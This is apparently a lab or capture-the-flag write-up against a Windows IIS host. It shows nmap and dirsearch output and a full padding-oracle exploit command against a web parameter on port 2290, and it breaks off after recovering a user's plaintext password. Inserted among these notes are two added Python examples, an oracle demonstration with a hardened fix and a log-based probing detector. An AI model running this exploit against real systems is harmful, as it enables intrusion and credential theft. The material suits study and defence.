sudo nmap -sS -sCV -p- -Pn -v -oN Nmap/Initial-Vector Vector
# Nmap 7.94SVN scan initiated Fri Jun 21 04:39:14 2024 as: nmap -sS -sCV -p- -Pn -v -oN Nmap/Initial-Vector Vector
Nmap scan report for Vector (192.168.222.119)
Host is up (0.26s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2290/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-21T08:50:25+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=vector
| Issuer: commonName=vector
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-22T16:36:29
| Not valid after: 2024-09-21T16:36:29
| MD5: 3a68:bca7:93da:d9d9:0748:1a1d:b6a1:9e0c
|_SHA-1: 5ae7:a6d8:afd7:50a4:e1bf:d7b6:21c7:23b9:7aac:a79a
| rdp-ntlm-info:
| Target_Name: VECTOR
| NetBIOS_Domain_Name: VECTOR
| NetBIOS_Computer_Name: VECTOR
| DNS_Domain_Name: vector
| DNS_Computer_Name: vector
| Product_Version: 10.0.17763
|_ System_Time: 2024-06-21T08:49:44+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-06-21T08:49:43
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Fri Jun 21 04:50:27 2024 -- 1 IP address (1 host up) scanned in 672.99 seconds
sudo dirsearch -u <IP:port> -w /path/to/wordlist
# Dirsearch started Fri Jun 21 04:49:16 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://Vector -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
404 2KB http://Vector/aux
404 2KB http://Vector/com1
404 2KB http://Vector/com2
404 2KB http://Vector/com3
404 2KB http://Vector/com4
404 2KB http://Vector/con
404 2KB http://Vector/lpt2
404 2KB http://Vector/lpt1
404 2KB http://Vector/nul
404 2KB http://Vector/prn

Using this exploit (the project's own description is quoted below):
https://github.com/mpgn/Padding-oracle-attack
An exploit for the Padding Oracle Attack. Tested against ASP.NET, works like a charm. The CBC mode must use PKCS7 for the padding block. This is an implementation of this great article Padding Oracle Attack. Since the article is not very well written and may be unclear, I made an explanation in the readme. I advise you to read it if you want to understand the basics of the attack. This exploit allows block sizes of 8 or 16. This means it can be used if the cipher uses AES or DES. You can find instructions to launch the attack here.
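The description above names the two ingredients the attack needs: CBC mode with PKCS#7 padding, and a server that reacts differently when the padding is wrong. The script below is an added example (not code from this write-up and not from the mpgn tool) that shows both sides of that condition. A toy, hypothetical block cipher stands in for AES/DES so it runs on the standard library alone; `vulnerable_handler` mirrors an endpoint whose label flips on a padding failure (the `<span id="MyLabel">0</span>` marker is the one used in this write-up, the success marker is assumed); `hardened_handler` checks an HMAC over IV and ciphertext in constant time before unpadding and answers every failure identically; `distinct_responses` is a self-test a developer can run against either handler.

```python
"""Why a CBC/PKCS#7 endpoint becomes a padding oracle, and how a hardened form
closes it. Added example: not code from the write-up or from the mpgn tool.
A toy keyed block cipher (hypothetical, insecure) stands in for AES/DES so the
script runs on the standard library alone; the CBC and PKCS#7 layers around
it are real, and that is where the oracle lives."""
import hashlib
import hmac
import secrets

BLOCK = 16                               # block length in bytes, as in -l 16
ERROR = '<span id="MyLabel">0</span>'    # error marker taken from the page
SUCCESS = '<span id="MyLabel">1</span>'  # assumed success marker (constructed)

def _subkey(key: bytes, label: bytes) -> bytes:
    return hashlib.sha256(key + label).digest()[:BLOCK]

def _toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    # Toy permutation: XOR with a key-derived pad, then rotate left by 3 bytes.
    x = bytes(a ^ b for a, b in zip(block, _subkey(key, b"blk")))
    return x[3:] + x[:3]

def _toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    x = block[-3:] + block[:-3]
    return bytes(a ^ b for a, b in zip(x, _subkey(key, b"blk")))

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    # The distinguishable failure: raises only when the padding is malformed.
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    prev = secrets.token_bytes(BLOCK)    # random IV, shipped as block 0
    out = bytearray(prev)
    padded = pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        mixed = bytes(a ^ b for a, b in zip(padded[i:i + BLOCK], prev))
        prev = _toy_encrypt_block(key, mixed)
        out += prev
    return bytes(out)

def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    if len(data) % BLOCK or len(data) < 2 * BLOCK:
        raise ValueError("bad length")
    prev, out = data[:BLOCK], bytearray()
    for i in range(BLOCK, len(data), BLOCK):
        cur = data[i:i + BLOCK]
        out += bytes(a ^ b for a, b in zip(_toy_decrypt_block(key, cur), prev))
        prev = cur
    return pkcs7_unpad(bytes(out))

def vulnerable_handler(key: bytes, c_hex: str) -> str:
    """Mimics /?c=<hex>: the label flips on a padding failure, so each request
    tells the client whether the padding of the ciphertext it chose was valid."""
    try:
        cbc_decrypt(key, bytes.fromhex(c_hex))
        return SUCCESS
    except ValueError:
        return ERROR

def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: the HMAC tag covers the IV and every ciphertext block."""
    ct = cbc_encrypt(_subkey(key, b"enc"), plaintext)
    return ct + hmac.new(_subkey(key, b"mac"), ct, hashlib.sha256).digest()

def hardened_handler(key: bytes, c_hex: str) -> str:
    """Verify the tag in constant time before anything is decrypted or unpadded,
    and answer every failure with the same response."""
    try:
        data = bytes.fromhex(c_hex)
        ct, tag = data[:-32], data[-32:]
        want = hmac.new(_subkey(key, b"mac"), ct, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, want):
            raise ValueError("bad tag")
        cbc_decrypt(_subkey(key, b"enc"), ct)
        return SUCCESS
    except ValueError:
        return ERROR

def distinct_responses(handler, key: bytes, token: bytes, pos: int) -> int:
    """Developer self-test: replace one ciphertext byte with every other value
    and count the distinct responses. 1 means the endpoint reveals nothing
    about the padding check; more than 1 means it is an oracle."""
    seen = set()
    for v in range(256):
        if v != token[pos]:              # skip the untouched token itself
            probe = bytearray(token)
            probe[pos] = v
            seen.add(handler(key, bytes(probe).hex()))
    return len(seen)
```

Running `distinct_responses` against `vulnerable_handler` with the last byte of the second-to-last block as `pos` yields two different answers, which is exactly the signal an oracle tool keys on via its `--error` string; against `hardened_handler` the same sweep yields one, because any modified byte fails the MAC before padding is ever examined. In production code the same property comes for free from an authenticated mode such as AES-GCM, which is the simpler fix compared with hand-rolling CBC plus HMAC; Microsoft's framework-level fix for the ASP.NET variant was MS10-070.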

Here is a breakdown of the tool's parameters:
The full command format for this exploit to work is:
sudo python exploit.py -c 4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488 -l 16 --host Vector:2290 -u /?c= -v --error '<span id="MyLabel">0</span>'
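The command above sends a long series of requests to `/?c=` on port 2290 and classifies each reply by whether `<span id="MyLabel">0</span>` appears in it. As an added example (not from this write-up), here is detection logic a defender could run over the IIS W3C logs of that service: it reads the `#Fields` header, pulls the hex token out of the `c` parameter, and flags a client whose consecutive tokens differ in exactly one byte, the shape of a byte-by-byte sweep. Status codes are deliberately ignored, since an application-level error marker like the one on this page can come back with HTTP 200. The log lines, the client addresses and the 48-byte token are constructed; the field list is a subset of what IIS writes.

```python
"""Flagging padding-oracle probing in IIS W3C extended logs.
Added example, not from the write-up. The sample lines are constructed; the
token bytes are a placeholder, not the ciphertext from the page."""
import urllib.parse
from collections import defaultdict

FIELDS = "#Fields: "

def parse_w3c(lines):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    names = None
    for line in lines:
        if line.startswith(FIELDS):
            names = line[len(FIELDS):].split()
        elif line and not line.startswith("#") and names:
            yield dict(zip(names, line.split()))

def hex_param(query: str, name: str = "c"):
    """Return the decoded bytes of a hex-valued query parameter, else None."""
    if query == "-":
        return None
    values = urllib.parse.parse_qs(query).get(name)
    if not values:
        return None
    try:
        return bytes.fromhex(values[0])
    except ValueError:
        return None

def byte_diff(a: bytes, b: bytes) -> int:
    return sum(x != y for x, y in zip(a, b)) + abs(len(a) - len(b))

def find_probing(lines, min_requests=32, min_single_byte_ratio=0.8):
    """Group hex-token requests by (client, path); flag groups where most
    consecutive tokens differ in exactly one byte."""
    groups = defaultdict(list)
    for rec in parse_w3c(lines):
        token = hex_param(rec.get("cs-uri-query", "-"))
        if token is not None:
            groups[(rec["c-ip"], rec["cs-uri-stem"])].append(
                (rec["date"] + " " + rec["time"], token))
    findings = []
    for (client, path), reqs in groups.items():
        if len(reqs) < min_requests:
            continue
        reqs.sort()                       # chronological, timestamp is ISO-like
        pairs = list(zip(reqs, reqs[1:]))
        single = sum(byte_diff(a, b) == 1 for (_, a), (_, b) in pairs)
        ratio = single / len(pairs)
        if ratio >= min_single_byte_ratio:
            findings.append({
                "client": client, "path": path, "requests": len(reqs),
                "distinct_tokens": len({t for _, t in reqs}),
                "single_byte_ratio": round(ratio, 2),
                "first": reqs[0][0], "last": reqs[-1][0],
            })
    return findings

def constructed_sample_log(n_probes: int = 64):
    """Constructed lines: one ordinary visitor, then one client sweeping byte 31
    of a 48-byte placeholder token (three 16-byte blocks) on /?c= at port 2290."""
    lines = ["#Software: Microsoft Internet Information Services 10.0",
             "#Version: 1.0",
             "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query "
             "s-port c-ip cs(User-Agent) sc-status time-taken"]
    base = bytes(range(48))

    def entry(sec, ip, query):
        return (f"2024-06-21 08:{sec // 60:02d}:{sec % 60:02d} 10.0.0.5 GET / "
                f"{query} 2290 {ip} Mozilla/5.0 200 12")

    lines.append(entry(0, "10.0.0.20", "c=" + base.hex()))
    lines.append(entry(7, "10.0.0.20", "-"))
    for i in range(n_probes):
        probe = bytearray(base)
        probe[31] = i
        lines.append(entry(100 + i, "10.0.0.99", "c=" + bytes(probe).hex()))
    return lines
```

`find_probing(constructed_sample_log())` returns one finding for `10.0.0.99` with 64 requests, 64 distinct tokens and a single-byte ratio of 1.0, while the ordinary visitor never reaches `min_requests`. The thresholds are starting points: a legitimate client re-sending the same token many times scores a ratio of 0, and a token that is re-issued on every response would show larger diffs, so the one-byte signature separates a sweep from both.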

Working!

Plain text password of the user Victor
After gaining the password,